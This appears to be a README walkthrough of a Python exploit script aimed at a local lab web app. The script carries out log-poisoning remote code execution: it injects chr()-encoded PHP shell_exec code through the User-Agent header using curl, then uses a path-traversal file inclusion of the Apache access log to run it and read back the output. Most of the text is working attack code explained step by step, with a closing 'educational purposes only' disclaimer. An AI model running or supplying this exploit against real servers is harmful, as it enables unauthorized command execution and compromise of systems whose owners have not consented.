This Python script allows you to execute commands on a vulnerable server through a PHP shell and extract the results from Apache2 access logs. The script follows the steps to encode the user input as a PHP shell command, send it via a curl request, and parse the Apache2 access logs to extract and display the results.
command = input("Enter command: ")- The script starts by prompting the user to enter a command. The entered command will be executed on the server using a PHP shell.
result = "<?php echo shell_exec("
for i in command:
result += f"chr({ord(i)})."
result = result[:-1] + ")?>"- The entered command is encoded as PHP code. Each character of the input is converted to its corresponding ASCII value and then back to a character using
chr()function. The final result is a PHP shell code that can execute the user input.
curl_command = (
f'curl -X GET "http://localhost/vulnerabilities/fi/?page=file1.php" '
f'-H "User-Agent: .###START###.{result}.###END###." '
'-H "Cookie: security_level=0; PHPSESSID=2r607gpref90ln1daitgg4nse6; security=low"'
)- A
curlcommand is created to send the PHP shell code to a vulnerable web application through theUser-Agentheader. TheUser-Agentheader contains the encoded PHP shell code that will be executed on the server.
subprocess.run(curl_command, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)- The
curlcommand is executed usingsubprocess.run(), which sends the crafted request to the web server. The standard output and error are discarded to prevent unnecessary logs.
url = "http://localhost/vulnerabilities/fi/?page=../../../../../../../../var/log/apache2/access.log"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
}
cookies = {
"security_level": "0",
"PHPSESSID": "2r607gpref90ln1daitgg4nse6",
"security": "low"
}
response = requests.get(url, headers=headers, cookies=cookies)- The script attempts to read the Apache2 access logs (
access.log) by sending a GET request to the vulnerable web application. The request includes custom headers and cookies that ensure the request is processed correctly.
if response.status_code == 200:
clean_response = re.sub(r'<[^>]+>', '', response.text)
lines = clean_response.splitlines()
found_lines = []- Once a successful response is received (HTTP status code 200), the script removes HTML tags from the response and splits the cleaned text into lines for further analysis.
for line in lines:
if line.strip().startswith("172.17.0.1"):
found_lines.append(line)- The script scans the log lines to find entries that begin with the IP address
172.17.0.1. These are assumed to be relevant logs that contain the execution result of the PHP shell.
if found_lines:
last_line = found_lines[-1]
last_line_index = lines.index(last_line)
if last_line_index + 1 < len(lines):
combined_lines = lines[last_line_index:]
full_text = "
".join(combined_lines)
match = re.search(r'\.###START###\.(.*?)\.###END###\.', full_text, re.DOTALL)
if match:
print(match.group(1).strip()) - The script checks the log lines for the presence of the
###START###and###END###markers that wrap the output of the PHP shell command. If found, it extracts and prints the result.
else:
print("Error: No line starting with '172.17.0.1' found in the response.")- If no matching lines are found, an error message is displayed to indicate that no relevant log entries were detected.
- Python 3.x
requestslibrary (Install withpip install requests)
- Run the script using Python.
- Enter a command you wish to execute on the server.
- The script will attempt to execute the command and print the output from the Apache2 access logs.
This script is intended for educational purposes only. Do not use it on systems you do not have explicit permission to test. Unauthorized access to systems is illegal and unethical.